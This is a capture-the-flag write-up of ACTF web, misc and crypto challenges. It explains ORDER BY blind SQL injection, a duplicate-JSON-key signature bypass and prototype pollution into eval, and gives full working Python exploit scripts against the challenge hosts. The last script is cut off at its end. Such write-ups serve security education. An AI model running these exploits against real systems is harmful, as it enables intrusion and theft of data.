Web

12307

Book your train ticket to the FLAG…… Now!

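At its core, this challenge is a fairly long business-logic exploit chain. The goal is to push the restricted "corporate reconciliation receipt rendering" flow into the internal print chain, then use the print chain to run a whitelisted program that reads /flag.

The exploit rests on two core issues:

  1. The station_portal endpoint /api/station-office/fares/reprice accepts a controllable ORDER BY expression, which allows boolean-based blind injection and lets us extract station_claim_artifacts.claim_salt.
  2. receipt_signer validates carrierSeal.payload with a JSON parser in which the first occurrence of a duplicate key wins, but later builds print_plan with the standard JSON parser, in which the last occurrence wins. A payload with duplicate keys therefore shows safe values to the validator and dangerous values to the renderer.

Combined with several business endpoints (station notice import, desk adjustment, corporate import, and the waitlist websocket), this satisfies every check made by the signer and the settlement worker, and the base64 output of /flag shows up in the reconciliation result.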

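Service analysis

Main ticketing flow

services/ticketing_api/app.py

  • POST /api/orders creates an order.
  • For G7608 business seats the initial inventory is 0, so a new order goes straight to waitlisted.
  • A waitlisted order calls issue_claim_artifact(), which writes the following to station_claim_artifacts:
    • order_id
    • ticket_no
    • claim_salt
    • claim_digest

This is exactly the data the later desk adjustment flow depends on.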

claimProof validation

services/station_portal/app.py

POST /api/station-office/tickets/adjust checks that:

  • ticketNo exists
  • the database holds an unexpired station_claim_artifacts row
  • the supplied claimProof equals:
CP-{claim_salt}-{sha256(order_id|train_id|station_code|ticket_no|claim_salt)[:12]}

So once claim_salt is known, a valid claimProof can be forged.
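
The format above can be sketched in a few lines of Python. This is only an illustration of the string layout described in the writeup: the order ID and salt below are hypothetical placeholders, and the server-side comparison logic is not reproduced.

```python
import hashlib


def make_claim_proof(order_id, train_id, station_code, ticket_no, claim_salt):
    """Build CP-{salt}-{first 12 hex chars of sha256 over the '|'-joined fields}."""
    material = "|".join([order_id, train_id, station_code, ticket_no, claim_salt])
    digest = hashlib.sha256(material.encode()).hexdigest()
    return f"CP-{claim_salt}-{digest[:12]}"


# "ORD-EXAMPLE" and "SALT12345" are made-up values used only for illustration.
proof = make_claim_proof("ORD-EXAMPLE", "G7608", "HGH", "T-HGH-7608-019", "SALT12345")
print(proof)
```

The only secret input is claim_salt; every other field is known to the attacker, which is why leaking the salt is enough.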

SQL injection point

reprice_fare() in the same file:

scope = fare_scope_expression(data.get("tariffScope", "ticket"))
sql = (
    "SELECT ticket_no,station_code,status FROM ticket_index "
    "WHERE station_code IN (%s,'BJP') "
    f"ORDER BY {scope} LIMIT 1"
)

Inside fare_scope_expression():

if scope.get("mode") == "legacy-rank":
    return str(scope.get("expr", "ticket_no"))[:240]

In other words, submitting:

{
  "tariffScope": {
    "mode": "legacy-rank",
    "expr": "..."
  }
}

splices an arbitrary expression (up to 240 characters) into ORDER BY.

The endpoint returns a different bucket depending on the ticket_no prefix of the first row of the query result:

  • T-BJP-... -> north-window
  • anything else -> local-window

This gives a boolean blind injection channel.

Exploit chain

Step 1: Create a waitlist order

The goal is to obtain a fresh HGH / G7608 / business waitlist order.

Replay the same identity continuation flow the front end uses:

  • POST /api/mobile/identity/continue
  • POST /api/mobile/orders/hold
  • POST /api/mobile/orders

This yields:

  • passenger_session
  • waitlist_session
  • a new waitlist orderId

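Step 2: Blindly extract claim_salt

Use the legacy-rank injection point in /api/desk/fares/reprice.

The boolean expression can be written as:

(case when (<condition>) then (station_code='HGH') else (station_code='BJP') end) desc

If <condition> is true, HGH tickets sort first and the response is local-window.

Otherwise BJP tickets sort first and the response is north-window.

claim_salt can then be extracted one character at a time:

substr((select claim_salt from station_claim_artifacts where order_id='...'),pos,1)

The salt extracted for the new order is: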

RQDWRNFDP
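
The oracle and the character-by-character extraction can be reproduced offline. The sketch below is a local simulation, not the challenge service: it assumes an in-memory SQLite database, a trimmed-down schema, two made-up ticket rows, and a hypothetical order ID 'ORD-1'. It only mirrors the ORDER BY concatenation pattern and the bucket rule described above.

```python
import sqlite3

CHARS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def make_db(secret_salt):
    """Create a toy database with one HGH ticket, one BJP ticket and one salt."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ticket_index (ticket_no TEXT, station_code TEXT, status TEXT);
        CREATE TABLE station_claim_artifacts (order_id TEXT, claim_salt TEXT);
        INSERT INTO ticket_index VALUES ('T-HGH-7608-019', 'HGH', 'waitlisted');
        INSERT INTO ticket_index VALUES ('T-BJP-0001-001', 'BJP', 'issued');
    """)
    db.execute("INSERT INTO station_claim_artifacts VALUES ('ORD-1', ?)", (secret_salt,))
    return db


def bucket(db, expr):
    """Vulnerable pattern: expr is concatenated into ORDER BY unescaped."""
    sql = ("SELECT ticket_no FROM ticket_index "
           "WHERE station_code IN (?, 'BJP') "
           f"ORDER BY {expr} LIMIT 1")
    ticket_no = db.execute(sql, ("HGH",)).fetchone()[0]
    return "north-window" if ticket_no.startswith("T-BJP-") else "local-window"


def oracle(db, condition):
    """Return True when the injected condition holds (HGH row sorts first)."""
    expr = (f"(case when ({condition}) then (station_code='HGH') "
            "else (station_code='BJP') end) desc")
    return bucket(db, expr) == "local-window"


def extract_salt(db, length):
    """Binary-search each character's 1-based index in CHARS via the oracle."""
    salt = ""
    for pos in range(1, length + 1):
        lo, hi = 1, len(CHARS)
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (f"instr('{CHARS}', substr((select claim_salt from "
                    f"station_claim_artifacts where order_id='ORD-1'),{pos},1))>{mid}")
            if oracle(db, cond):
                lo = mid + 1
            else:
                hi = mid
        salt += CHARS[lo - 1]
    return salt


db = make_db("RQDWRNFDP")
print(extract_salt(db, 9))
```

With a 36-character alphabet the binary search needs at most six requests per character, which keeps the remote extraction short.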

This lets us compute:

claim_digest = sha256(order_id|G7608|HGH|T-HGH-7608-019|RQDWRNFDP)
claim_proof = CP-RQDWRNFDP-48958b5a1cf5

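Step 3: Satisfy the trusted-station conditions

receipt_signer requires several context conditions to hold at the same time. The key ones are:

  • the station profile has batch_open enabled
  • the route matches a trusted lane
  • the partner jwks has been written to redis
  • the waitlist entry has been sampled
  • the layout entitlement has been issued
  • a passenger continuation exists
  • a ledger channel exists

These are satisfied in several steps.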

Writing lane/jwks/board profile via notice + import

compile_notice_feed() in services/station_import/app.py reads the most recent station_notices.proxy_hint and, once its conditions are met, writes:

  • rail:interline:lane:{station}
  • rail:board:profile:{station}
  • rail:partner:jwks:{station}

So first post a notice:

X-Desk-Lane: delta-window-27
X-Board-Window: seat-window-e27
X-Desk-Key-Id: POL-HGH-TRUSTED
X-Desk-Key: delta-window-27

Then call:

POST /api/desk/imports/health
adapter = station-partner-feed

This writes the trusted lane, board profile, and partner jwks into redis.

Triggering the desk rule with a valid claimProof

POST /api/desk/tickets/adjust

Send:

  • ticketNo = T-HGH-7608-019
  • claimProof = CP-RQDWRNFDP-48958b5a1cf5
  • memo as a JSON string

Example memo:

{
  "stationCode": "HGH",
  "channel": "fare-desk",
  "lineItems": {
    "reason": "FARE-91",
    "layout": "folio-grid-27",
    "device": "PR-HGH-042",
    "enabled": true
  }
}

Then call:

POST /api/desk/imports/health
adapter = station-desk-ledger
target contains orderId and stationCode

This triggers apply_adjustment_rules(), which performs:

  • waitlist_entries.sampled = 1
  • station_profiles.batch_open = 1
  • station_profiles.renderer_profile = folio-grid-27
  • station_profiles.signer_route = delta-window-27
  • a write to tariff_exception_claims

Activating the layout entitlement

Call:

POST /api/corporate/imports/relay
adapter = enterprise-clearing
target = rail-mesh://clearing/layout?orderId=...&stationCode=HGH

This reaches activate_layout_claim(), which:

  • changes the corresponding layout cell to service-device
  • writes rail:layout:entitlement:{orderId} = HGH

Setting the fulfillment epoch

We also need:

rail:fulfillment:epoch:{orderId} = boarding

This can be set via:

POST /api/corporate/imports/relay
adapter = fulfillment-monitor

Note that this key has a very short expiry, so it has to be set again right before the schedule call.

Step 4: Obtain ledgerRef

services/waitlist_push/server.js

Over the websocket /api/connect/boarding, complete:

  1. boarding.hello
  2. boarding.bind
  3. boarding.confirm

On success, redis gets:

  • rail:ledger:channel:{orderId}

and the endpoint returns:

  • ledgerRef
  • boardingNonce

When receipt_signer validates carrierSeal, its ledgerRef must match this value.

Step 5: Bypass signer validation with duplicate JSON keys

services/receipt_signer/app.py

Key logic:

public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)

Here:

  • public_view keeps the first occurrence of a duplicate key
  • render_view keeps the last occurrence

And later:

  • validation uses public_view
  • print_plan generation uses render_view

So the payload can be built as:

{
  "batchId": "...",
  "orderId": "...",
  "stationCode": "HGH",
  "templateDigest": "...",
  "routeName": "delta-window-27",
  "ledgerRef": "...",
  "printProfile": "counter-copy",
  "printer": "thermal-standard",
  "prefix": "reconciliation",
  "cell": "receipt",
  "printProfile": "clearing-batch",
  "printer": "line-printer",
  "driverProgram": "/usr/bin/base64",
  "driverArgument": "/flag"
}

As a result:

  • signer validation sees
    • printProfile = counter-copy
    • printer = thermal-standard
  • the settlement worker actually renders with
    • printProfile = clearing-batch
    • printer = line-printer
    • driverProgram = /usr/bin/base64
    • driverArgument = /flag
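
The split between the two views is easy to reproduce locally. In the sketch below, first_wins_object is a hypothetical stand-in written for illustration (the writeup names the hook but does not show its body), and the payload is reduced to the fields that matter.

```python
import json


def first_wins_object(pairs):
    """Hypothetical stand-in for the signer's hook: keep the first value per key."""
    result = {}
    for key, value in pairs:
        result.setdefault(key, value)
    return result


payload_text = (
    '{"printProfile":"counter-copy","printer":"thermal-standard",'
    '"printProfile":"clearing-batch","printer":"line-printer",'
    '"driverProgram":"/usr/bin/base64","driverArgument":"/flag"}'
)

# Validation view: the first occurrence of each duplicate key survives.
public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
# Rendering view: Python's default parser keeps the last occurrence.
render_view = json.loads(payload_text)

print(public_view["printProfile"], public_view["printer"])
print(render_view["printProfile"], render_view["printer"])
```

Because both views are parsed from the same signed bytes, the signature stays valid while the two consumers disagree about the content.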

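Reading the flag with /usr/bin/base64

The Dockerfile contains:

profile-delta-closeout -> acceptedPrograms = ["/usr/bin/base64"]

and /usr/bin/base64 has the SUID bit set:

chmod 4755 /usr/bin/base64

So the print chain ends up reading /flag with elevated privileges and emitting its contents base64-encoded.

Generating the receipt and scheduling the render

First create a deferred batch: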

POST /api/corporate/reconciliation
reportType = carrier-closeout
defer = true

Then call:

POST /api/corporate/receipts/prepare

On success this returns signed.

Finally, right before scheduling, send this once more:

adapter = fulfillment-monitor

because the fulfillment epoch expires quickly.

Then:

POST /api/corporate/settlement/schedule
GET /api/corporate/reconciliation/{batchId}

The final response is:

Reconciliation ORMG42V34OQ waitlisted QUNURnt3SHlfYXIxX3kwdV9zbzBPMG8wT28wb19GYXMxPz8/Pz9fQzJDZnc2cnlEOTR9

Base64-decoding the last token gives the flag:

ACTF{wHy_ar1_y0u_so0O0o0Oo0o_Fas1?????_C2Cfw6ryD94}
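
The decoding step can be checked with a minimal snippet. It assumes the report body has exactly the shape shown above, with the base64 token as the last whitespace-separated field.

```python
import base64

report_body = (
    "Reconciliation ORMG42V34OQ waitlisted "
    "QUNURnt3SHlfYXIxX3kwdV9zbzBPMG8wT28wb19GYXMxPz8/Pz9fQzJDZnc2cnlEOTR9"
)

# The last field of the report is the base64 output of the print driver.
token = report_body.split()[-1]
flag = base64.b64decode(token).decode()
print(flag)
```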

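The key vulnerabilities in this challenge can be summarized as:

  1. ORDER BY expression injection, leading to boolean blind injection
  2. The claimProof business object can be forged, which opens up the desk adjustment flow
  3. The notice feed and import relay can write several "trusted context" states into redis
  4. Duplicate JSON keys in carrierSeal are parsed inconsistently, splitting the validation view from the execution view
  5. The print chain may execute whitelisted programs, and base64 happens to be able to read /flag

Full exploit script:
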
import base64
import hashlib
import hmac
import http.cookiejar
import json
import os
import socket
import struct
import time
import urllib.error
import urllib.parse
import urllib.request


BASE = "http://web-cd84eb9c96.adworld.xctf.org.cn:80"
TRAIN = "G7608"
STATION = "HGH"
SEAT = "business"
TICKET = "T-HGH-7608-019"
POLICY_ID = "POL-HGH-TRUSTED"
POLICY_KEY = "e94c0a8d-12307-hgh-trusted"
ROUTE = "delta-window-27"
CHARS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def build_opener(with_cookie=False):
    if with_cookie:
        jar = http.cookiejar.CookieJar()
        opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
        opener.addheaders = [("User-Agent", "Mozilla/5.0")]
        return opener, jar
    opener = urllib.request.build_opener()
    opener.addheaders = [("User-Agent", "Mozilla/5.0")]
    return opener, None


def req(opener, method, path, obj=None, headers=None, timeout=20):
    data = None
    hdrs = headers.copy() if headers else {}
    if obj is not None:
        data = json.dumps(obj).encode()
        hdrs.setdefault("Content-Type", "application/json")
    request = urllib.request.Request(BASE + path, data=data, headers=hdrs, method=method)
    try:
        resp = opener.open(request, timeout=timeout)
        raw = resp.read().decode(errors="replace")
        try:
            body = json.loads(raw or "{}")
        except Exception:
            body = {"raw": raw}
        print(f"[HTTP] {method} {path} -> {resp.status} {body}")
        return resp.status, dict(resp.headers), body
    except urllib.error.HTTPError as exc:
        raw = exc.read().decode(errors="replace")
        try:
            body = json.loads(raw or "{}")
        except Exception:
            body = {"raw": raw}
        print(f"[HTTP] {method} {path} -> {exc.code} {body}")
        return exc.code, dict(exc.headers), body


def create_waitlist_order():
    opener, jar = build_opener(True)
    req(opener, "POST", "/api/mobile/identity/continue", {
        "passenger": "fresh",
        "relayState": {"next": "rail://continue/seat-hold", "flow": ["seat-hold"]},
        "partnerMetadata": {
            "entityID": "railway-partner",
            "compatBinding": "x-accel",
            "role": "PassengerIdentityProvider",
        },
        "assertion": "<Assertion><Audience>12307</Audience><NameID>mobile-passenger</NameID><Signature>RelayState</Signature></Assertion>",
        "trustLevel": ["mobile", "partner"],
        "stationCode": STATION,
    })
    req(opener, "POST", "/api/mobile/orders/hold", {
        "trainId": TRAIN,
        "seatClass": SEAT,
        "holdMode": "waitlist",
    })
    _, _, data = req(opener, "POST", "/api/mobile/orders", {
        "trainId": TRAIN,
        "seatClass": SEAT,
        "passenger": "fresh",
    })
    order_id = data["order"]["id"]
    print("[*] new order:", order_id)
    return opener, jar, order_id


def blind_claim_salt(order_id):
    opener, _ = build_opener(False)

    def bucket(expr):
        _, _, body = req(opener, "POST", "/api/desk/fares/reprice", {
            "stationCode": STATION,
            "amount": 1,
            "tariffScope": {
                "mode": "legacy-rank",
                "expr": expr,
            },
        })
        return body["quote"]["bucket"]

    # The first character is hard-coded as "R" here; only positions 2..9
    # are recovered through the blind oracle.
    salt = "R"
    for pos in range(2, 10):
        # Binary search over the 1-based index of the character in CHARS.
        lo, hi = 1, 36
        while lo < hi:
            mid = (lo + hi) // 2
            cond = (
                f"instr('{CHARS}',"
                f"substr((select claim_salt from station_claim_artifacts where order_id='{order_id}'),{pos},1)"
                f")>{mid}"
            )
            expr = f"(case when ({cond}) then (station_code='HGH') else (station_code='BJP') end) desc"
            if bucket(expr) == "local-window":
                lo = mid + 1
            else:
                hi = mid
        salt += CHARS[lo - 1]
        print("[*] salt =>", salt)
    return salt


def make_claim_proof(order_id, salt):
    digest = hashlib.sha256(f"{order_id}|{TRAIN}|{STATION}|{TICKET}|{salt}".encode()).hexdigest()
    return f"CP-{salt}-{digest[:12]}"


def setup_station_context(opener, order_id, claim_proof):
    proxy_hint = "\n".join([
        "X-Desk-Lane: delta-window-27",
        "X-Board-Window: seat-window-e27",
        "X-Desk-Key-Id: POL-HGH-TRUSTED",
        "X-Desk-Key: delta-window-27",
    ])
    req(opener, "POST", "/api/desk/notices", {
        "stationCode": STATION,
        "title": "sync",
        "body": "sync",
        "proxyHint": proxy_hint,
    })
    req(opener, "POST", "/api/desk/imports/health", {
        "stationCode": STATION,
        "adapter": "station-partner-feed",
        "target": f"rail-cache://redis/partner/metadata?stationCode={STATION}",
        "payload": "feed=partner",
    })

    memo = {
        "stationCode": STATION,
        "channel": "fare-desk",
        "lineItems": {
            "reason": "FARE-91",
            "layout": "folio-grid-27",
            "device": "PR-HGH-042",
            "enabled": True,
        },
    }
    req(opener, "POST", "/api/desk/tickets/adjust", {
        "ticketNo": TICKET,
        "claimProof": claim_proof,
        "memo": json.dumps(memo, separators=(",", ":")),
        "delta": 0,
    })
    req(opener, "POST", "/api/desk/imports/health", {
        "stationCode": STATION,
        "adapter": "station-desk-ledger",
        "target": f"rail-mesh://desk/ledger?orderId={order_id}&stationCode={STATION}",
        "payload": "apply",
    })
    req(opener, "POST", "/api/corporate/imports/relay", {
        "stationCode": STATION,
        "adapter": "enterprise-clearing",
        "target": f"rail-mesh://clearing/layout?orderId={order_id}&stationCode={STATION}",
        "payload": "merge",
    })
    req(opener, "GET", f"/api/desk/reconciliation/metadata?stationCode={STATION}")
    req(opener, "GET", f"/api/mobile/coach/board?stationCode={STATION}")


def ws_read(sock, buf=b""):
    while True:
        while len(buf) < 2:
            buf += sock.recv(4096)
        b1, b2 = buf[0], buf[1]
        opcode = b1 & 0x0F
        masked = b2 >> 7
        length = b2 & 0x7F
        idx = 2
        if length == 126:
            while len(buf) < 4:
                buf += sock.recv(4096)
            length = struct.unpack("!H", buf[2:4])[0]
            idx = 4
        need = idx + (4 if masked else 0) + length
        while len(buf) < need:
            buf += sock.recv(4096)
        if masked:
            mask = buf[idx:idx + 4]
            idx += 4
            payload = bytearray(buf[idx:idx + length])
            for i in range(len(payload)):
                payload[i] ^= mask[i % 4]
            payload = bytes(payload)
        else:
            payload = buf[idx:idx + length]
        buf = buf[need:]
        if opcode == 1:
            return json.loads(payload.decode()), buf
        if opcode == 8:
            raise RuntimeError("websocket closed")


def ws_send(sock, obj):
    payload = json.dumps(obj, separators=(",", ":")).encode()
    mask = os.urandom(4)
    header = bytearray([0x81])
    length = len(payload)
    if length < 126:
        header.append(0x80 | length)
    else:
        header.extend([0x80 | 126])
        header.extend(struct.pack("!H", length))
    masked = bytes(payload[i] ^ mask[i % 4] for i in range(len(payload)))
    sock.sendall(bytes(header) + mask + masked)


def get_ledger_ref(order_id):
    opener, jar = build_opener(True)
    req(opener, "POST", "/api/mobile/identity/continue", {
        "passenger": "ws",
        "relayState": {"next": "rail://continue/seat-hold", "flow": ["seat-hold"]},
        "partnerMetadata": {
            "entityID": "railway-partner",
            "compatBinding": "x-accel",
            "role": "PassengerIdentityProvider",
        },
        "assertion": "<Assertion><Audience>12307</Audience><NameID>mobile-passenger</NameID><Signature>RelayState</Signature></Assertion>",
        "trustLevel": ["mobile", "partner"],
        "stationCode": STATION,
    })
    req(opener, "POST", "/api/mobile/orders/hold", {
        "trainId": TRAIN,
        "seatClass": SEAT,
        "holdMode": "waitlist",
    })

    parsed = urllib.parse.urlparse(BASE)
    host = parsed.hostname
    port = parsed.port or 80
    cookie_header = "; ".join(f"{c.name}={c.value}" for c in jar)
    ws_key = base64.b64encode(os.urandom(16)).decode()

    sock = socket.create_connection((host, port), timeout=10)
    handshake = (
        f"GET /api/connect/boarding?stationCode={STATION} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        "Upgrade: websocket\r\n"
        "Connection: Upgrade\r\n"
        "Sec-WebSocket-Version: 13\r\n"
        f"Sec-WebSocket-Key: {ws_key}\r\n"
        f"Cookie: {cookie_header}\r\n"
        "\r\n"
    )
    sock.sendall(handshake.encode())
    resp = b""
    while b"\r\n\r\n" not in resp:
        resp += sock.recv(4096)
    rest = resp.split(b"\r\n\r\n", 1)[1]

    msg, rest = ws_read(sock, rest)
    ws_send(sock, {"type": "boarding.hello", "channel": msg["channel"]})
    msg, rest = ws_read(sock, rest)
    ws_send(sock, {"type": "boarding.bind", "topic": "seat-consist", "trainId": TRAIN, "seatClass": SEAT})
    msg, rest = ws_read(sock, rest)
    ws_send(sock, {"type": "boarding.confirm", "orderId": order_id, "stationCode": STATION, "epoch": "manual"})
    msg, rest = ws_read(sock, rest)
    ledger_ref = msg["ledgerRef"]
    print("[*] ledgerRef:", ledger_ref)
    return ledger_ref


def create_duplicate_key_payload(batch_id, order_id, template_digest, ledger_ref):
    header_text = json.dumps({
        "alg": "HS256",
        "typ": "rail-carrier-seal",
        "kid": POLICY_ID,
    }, separators=(",", ":"))

    # Duplicate keys are used here on purpose:
    # the signer's public_view check takes the first occurrence,
    # while render_view takes the last one.
    # The JSON is assembled by hand because json.dumps cannot emit duplicates.
    payload_text = "{" + ",".join([
        "\"batchId\":" + json.dumps(batch_id),
        "\"orderId\":" + json.dumps(order_id),
        "\"stationCode\":" + json.dumps(STATION),
        "\"templateDigest\":" + json.dumps(template_digest),
        "\"routeName\":" + json.dumps(ROUTE),
        "\"ledgerRef\":" + json.dumps(ledger_ref),
        "\"printProfile\":\"counter-copy\"",
        "\"printer\":\"thermal-standard\"",
        "\"prefix\":\"reconciliation\"",
        "\"cell\":\"receipt\"",
        "\"printProfile\":\"clearing-batch\"",
        "\"printer\":\"line-printer\"",
        "\"driverProgram\":\"/usr/bin/base64\"",
        "\"driverArgument\":\"/flag\"",
    ]) + "}"

    protected = base64.urlsafe_b64encode(header_text.encode()).rstrip(b"=").decode()
    payload = base64.urlsafe_b64encode(payload_text.encode()).rstrip(b"=").decode()
    signature = base64.urlsafe_b64encode(
        hmac.new(POLICY_KEY.encode(), f"{protected}.{payload}".encode(), hashlib.sha256).digest()
    ).rstrip(b"=").decode()

    return {
        "protected": protected,
        "payload": payload,
        "signature": signature,
    }


def prepare_and_schedule(opener, order_id, ledger_ref):
    _, _, data = req(opener, "POST", "/api/corporate/reconciliation", {
        "orderId": order_id,
        "stationCode": STATION,
        "reportType": "carrier-closeout",
        "defer": True,
        "data": {"carrier": "solver"},
    })
    batch_id = data["batchId"]
    template_digest = data["templateDigest"]
    print("[*] batch:", batch_id)

    seal = create_duplicate_key_payload(batch_id, order_id, template_digest, ledger_ref)
    status, _, _ = req(opener, "POST", "/api/corporate/receipts/prepare", {
        "batchId": batch_id,
        "orderId": order_id,
        "stationCode": STATION,
        "templateDigest": template_digest,
        "trustLevel": ["mobile", "partner", "settlement"],
        "carrierSeal": seal,
    })
    if status != 201:
        raise RuntimeError("prepare receipt failed")

    # This key expires quickly, so set it again right before scheduling.
    req(opener, "POST", "/api/corporate/imports/relay", {
        "stationCode": STATION,
        "adapter": "fulfillment-monitor",
        "target": f"rail-mesh://fulfillment/window?orderId={order_id}&stationCode={STATION}",
        "payload": "observe",
    })

    req(opener, "POST", "/api/corporate/settlement/schedule", {
        "batchId": batch_id,
    })

    # Poll the report and try to base64-decode its tokens, last token first.
    for _ in range(12):
        time.sleep(0.8)
        _, _, body = req(opener, "GET", f"/api/corporate/reconciliation/{batch_id}")
        report = body.get("report")
        if report and report.get("ready"):
            text = report.get("body", "")
            print("[*] reconciliation body:", text)
            for token in text.replace("\n", " ").split()[::-1]:
                try:
                    flag = base64.b64decode(token + "===").decode()
                    return flag
                except Exception:
                    pass
    raise RuntimeError("flag not found in reconciliation report")


def main():
    opener, jar, order_id = create_waitlist_order()
    salt = blind_claim_salt(order_id)
    claim_proof = make_claim_proof(order_id, salt)
    print("[*] claimProof:", claim_proof)
    setup_station_context(opener, order_id, claim_proof)
    ledger_ref = get_ledger_ref(order_id)
    flag = prepare_and_schedule(opener, order_id, ledger_ref)
    print("[+] FLAG =", flag)


if __name__ == "__main__":
    main()

Misc

special day

Today is ACTF, and it is also Mother’s Day in China.
The competition matters, but don’t forget to send your mom a simple blessing.
Even one short sentence is enough.
Use _ to join the words, remove punctuation, and wrap it with ACTF{}.

Base64-decode SGFwcHkgTW90aGVyJ3MgRGF5LCBNb20h and submit the result in the required format.
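
A minimal sketch of the decoding and formatting follows. The decoded sentence is certain; the final flag string is an inference from the stated rules, assuming that "remove punctuation" means the apostrophe is simply dropped.

```python
import base64
import string

encoded = "SGFwcHkgTW90aGVyJ3MgRGF5LCBNb20h"
message = base64.b64decode(encoded).decode()

# Drop ASCII punctuation, then join the remaining words with underscores.
words = message.translate(str.maketrans("", "", string.punctuation)).split()
flag = "ACTF{" + "_".join(words) + "}"

print(message)
print(flag)
```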

ZJUAM Just Uses Awful Math

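Some shady guy sniffed the traffic of my Zhejiang University unified identity authentication login. Why is that shady guy so evil?

The login goes over plaintext HTTP, and the RSA encryption uses a small public key (n is only 256 bits), so n can be factored.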

from Crypto.Util.number import *

e = 65537
n = 0x90011418f37a7a075aead75a9829d38eb2d750fd17bb24e5861b89d7658a88c3
p = 202555251191383333988748320354737959551
q = 321566364572398185024295275472079273917
c = 0x590948ad2f7a3c0b1a2a5e5f470f4297db3b90623251132be2c5e5395cd12563
phi = (p-1)*(q-1)
d = inverse(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m).decode())
# ACTF{TLS_s@ves_THE_w0RLd}

∀gent

I vibe coding a website that contains an agent.
All things seem awesome except for its front end.
It sounds great though, agent coding for agent.
But both agent coding and human coding are build from small to big, maybe the same for this CTF problem.

The core entry point is server.js.

Two things stand out quickly:

  • src/store.js contains a hard-coded fake flag that is shown in the session messages
  • the genuinely dangerous logic is in the /api/projects/:id/agent/override chain

Call relationships:

  • server.js POST /api/projects/:id/agent/override
  • src/job-runner.js runOverrideJob
  • src/path-builder.js buildPropertyPath
  • src/tool-registry.js config.diff / policy.evaluate
  • src/config-engine.js applyChanges

The fake flag is hard-coded in src/store.js:

content: "ACTF{WuYan_1s_4_b19_Turt13_N07_7h3_F1n41_Fl4g}"

In src/path-builder.js:

function sanitizeSegment(input, fallback) {
  if (typeof input !== "string" || !input.trim()) {
    return fallback;
  }

  return input.trim();
}

function buildPropertyPath(request) {
  const scope = sanitizeSegment(request.scope, "release");
  const environment = sanitizeSegment(request.environment, "staging");
  const section = sanitizeSegment(request.section, "image");
  const field = sanitizeSegment(request.field, "tag");

  return `agentProfile.scopes.${scope}.environments.${environment}.${section}.${field}`;
}

Here scope/environment/section/field are barely filtered: they are only trimmed and then concatenated directly into the property path.
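
To see what this means for the resulting path, here is a Python port of the two functions, written only for illustration (the service itself is JavaScript, and Python's strip() is used as an approximation of trim()). It shows that a field value containing dots silently extends the path with extra segments.

```python
def sanitize_segment(value, fallback):
    """Port of sanitizeSegment: trims the input but never rejects dots."""
    if not isinstance(value, str) or not value.strip():
        return fallback
    return value.strip()


def build_property_path(request):
    """Port of buildPropertyPath: segments are joined without validation."""
    scope = sanitize_segment(request.get("scope"), "release")
    environment = sanitize_segment(request.get("environment"), "staging")
    section = sanitize_segment(request.get("section"), "image")
    field = sanitize_segment(request.get("field"), "tag")
    return f"agentProfile.scopes.{scope}.environments.{environment}.{section}.{field}"


# A single "field" value smuggles in three extra path segments.
path = build_property_path({"field": "constructor.prototype.policy"})
print(path)
```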

src/config-engine.js calls the vendored candidate-yaml-update-action:

const changedFile = upstream.processFile(
  path.basename(filePath),
  valueUpdates,
  actionOptions,
  actionLogger
);

Internally, candidate-yaml-update-action ends up calling:

jsonpath.value(copy, jsonPath, value);

This means the "config path" we control is actually parsed as a JSONPath.

Because the property path is controllable, we can write to:

agentProfile.scopes.release.environments.staging.image.constructor.prototype.policy

which pollutes the policy property on the object prototype.

Then, in evaluatePolicy in src/tool-registry.js:

const workspacePolicy = repoFacts.policy || {};

repoFacts has no policy property of its own, but because the prototype chain is polluted, repoFacts.policy resolves to the value we injected at Object.prototype.policy.

In src/tool-registry.js:

if (verdict.blockedCount > 0) {
  if (!allowCompatInterpreter) {
    throw new Error("strict numeric formula validation failed");
  }
  return executeFormulaExpression(...)
}

If the polluted bindingProfile is set to compat, execution enters the compatibility interpreter branch.

executeFormulaExpression directly contains:

const result = eval(`(function(${argNames.join(',')}) { return (${expression}); })`)(
  ...argValues
);

This lets the formula we control run as JavaScript.

The full exploit chain:

  1. Send a request to /api/projects/workspace-main/agent/override
  2. Pollute Object.prototype.policy via field=constructor.prototype.policy
  3. Inject:
    • bindingProfile=compat
    • selectorProfile=linked
    • resultProfile=decimal
    • exposeDebugContext=true
    • formula=<malicious JS expression>
  4. When the same route is triggered a second time, the server reads the polluted policy in policy.evaluate
  5. In compat mode, the formula we control is executed
  6. It reads /flag
  7. The result appears in job.result.evaluation.formulaResult of the returned JSON

Exploit script:

import json
import sys
from typing import Any

import requests


TARGET = "http://web-7c3e38687b.adworld.xctf.org.cn"
PROJECT_ID = "workspace-main"


def post_override(base_url: str, payload: dict[str, Any], ip: str) -> dict[str, Any]:
    url = f"{base_url}/api/projects/{PROJECT_ID}/agent/override"
    headers = {
        "Content-Type": "application/json",
        "X-Forwarded-For": ip,
    }
    r = requests.post(url, headers=headers, data=json.dumps(payload), timeout=30)
    r.raise_for_status()
    return r.json()


def build_pollution_payload() -> dict[str, Any]:
    formula = (
        "(function(){"
        "const fs=require('fs');"
        "for (const p of ['/flag','/flag.txt','/app/flag','/app/flag.txt']) {"
        "try { return fs.readFileSync(p,'utf8').toString() } catch (e) {}"
        "}"
        "return 'NOFLAG:'+process.cwd()"
        "})()"
    )
    return {
        "instruction": "set formula",
        "scope": "release",
        "environment": "staging",
        "section": "image",
        "field": "constructor.prototype.policy",
        "value": {
            "formula": formula,
            "bindingProfile": "compat",
            "resultProfile": "decimal",
            "selectorProfile": "linked",
            "exposeDebugContext": True,
        },
    }


def extract_formula_result(data: dict[str, Any]) -> str | None:
    try:
        return data["job"]["result"]["evaluation"]["formulaResult"]
    except Exception:
        return None


def main() -> None:
    base_url = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else TARGET
    payload = build_pollution_payload()

    print(f"[+] target: {base_url}")
    result: dict[str, Any] = {}
    # The polluted policy is read when the route is triggered again, so send
    # the same payload a second time if the first response has no result.
    for attempt in (1, 2):
        print(f"[+] sending pollution payload (attempt {attempt})...")
        result = post_override(base_url, payload, "8.8.8.8")
        flag = extract_formula_result(result)
        if flag:
            print("[+] flag found:")
            print(flag)
            return

    print("[-] flag not found in response")
    print(json.dumps(result, ensure_ascii=False, indent=2))


if __name__ == "__main__":
